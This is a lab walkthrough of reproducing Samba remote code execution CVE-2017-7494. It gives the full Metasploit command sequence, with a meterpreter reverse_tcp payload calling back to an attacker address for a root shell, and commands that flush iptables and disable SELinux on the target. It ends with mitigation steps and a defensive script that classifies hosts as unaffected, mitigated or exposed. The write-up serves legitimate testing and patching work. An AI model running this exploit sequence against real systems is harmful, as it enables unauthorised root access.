Description

On May 24, 2017, Samba released version 4.6.4, which fixed a serious remote code execution vulnerability. The vulnerability identifier is CVE-2017-7494.

Systems affected by the vulnerability

Samba 3.5.0 up to 4.6.4/4.5.10/4.4.14. Versions from 4.6.4/4.5.10/4.4.14 onward have the vulnerability fixed.

Reproduction

Download the iso.

Install the Samba server

yum install samba

Modify the configuration file (smb.conf) to share the directory created below

mkdir /home/samba

Start the server

service smb restart


Then open Metasploit in Kali, configure the parameters, and start the exploit.

Configure the parameters

msfconsole
search cve-2017-7494
use exploit/linux/samba/is_known_pipename
set RHOSTS 192.168.1.110
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.111
set TARGET 3
exploit


Exploit


Samba runs as root by default, so exploiting the vulnerability yields root privileges directly.

Problems

When Metasploit shows: [-] 192.168.1.106:445 - Exploit failed [unreachable]: Rex::HostUnreachable The host (192.168.1.106:445) was unreachable.
It could be that iptables or SELinux on the target blocked the connection.
Clear the iptables rules or stop iptables, and put SELinux into permissive mode (on the lab target only):

iptables -F            # clear the iptables rules
service iptables stop  # stop iptables
setenforce 0           # set SELinux to permissive mode

Solution

Modify the configuration file

Edit smb.conf and add the following line to the [global] section, then restart Samba:
nt pipe support = no

Note that this workaround disables named-pipe support and can break some functionality expected by Windows clients, so it is a stopgap rather than a replacement for patching.

Update the Samba server to a fixed version (4.6.4/4.5.10/4.4.14 or later).
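The following check, added here as an example and not part of the original write-up, classifies a host's exposure to CVE-2017-7494 from the Samba version string and its smb.conf, using the affected and fixed versions and the "nt pipe support = no" workaround described above. It assumes `smbd --version` prints a line of the form "Version 4.6.2" and that the configuration lives at /etc/samba/smb.conf.

```shell
#!/bin/sh
# Added example (not from the original write-up): classify a Samba host's
# exposure to CVE-2017-7494. Prints one of: unaffected | mitigated | exposed.

# version_fixed MAJOR MINOR PATCH -> exit 0 when the release is outside the
# affected range (older than 3.5.0, or 4.4.14 / 4.5.10 / 4.6.4 and newer).
version_fixed() {
    if [ "$1" -lt 3 ]; then return 0; fi
    if [ "$1" -eq 3 ] && [ "$2" -lt 5 ]; then return 0; fi   # pre-3.5.0
    if [ "$1" -gt 4 ]; then return 0; fi                        # 5.x and later
    if [ "$1" -eq 4 ]; then
        if [ "$2" -ge 7 ]; then return 0; fi                    # 4.7+ shipped fixed
        if [ "$2" -eq 6 ] && [ "$3" -ge 4 ]; then return 0; fi
        if [ "$2" -eq 5 ] && [ "$3" -ge 10 ]; then return 0; fi
        if [ "$2" -eq 4 ] && [ "$3" -ge 14 ]; then return 0; fi
    fi
    return 1
}

# mitigated_in_conf FILE -> exit 0 when an uncommented "nt pipe support = no"
# is present (Samba parameter names are case- and whitespace-insensitive).
mitigated_in_conf() {
    grep -Eiq '^[[:space:]]*nt[[:space:]]*pipe[[:space:]]*support[[:space:]]*=[[:space:]]*no[[:space:]]*$' "$1" 2>/dev/null
}

# samba_status VERSION SMB_CONF
# VERSION is "4.6.2" or the "Version 4.6.2" line printed by `smbd --version`
# (assumed output format); distro suffixes such as "-1.el7" are ignored.
samba_status() {
    ver=${1#Version }
    ver=${ver%%[!0-9.]*}
    IFS=. read -r major minor patch <<EOF
$ver
EOF
    patch=${patch%%[!0-9]*}
    if version_fixed "${major:-0}" "${minor:-0}" "${patch:-0}"; then
        echo unaffected
    elif mitigated_in_conf "$2"; then
        echo mitigated
    else
        echo exposed
    fi
}

# Usage on a live host (assumed paths):
#   samba_status "$(smbd --version)" /etc/samba/smb.conf
```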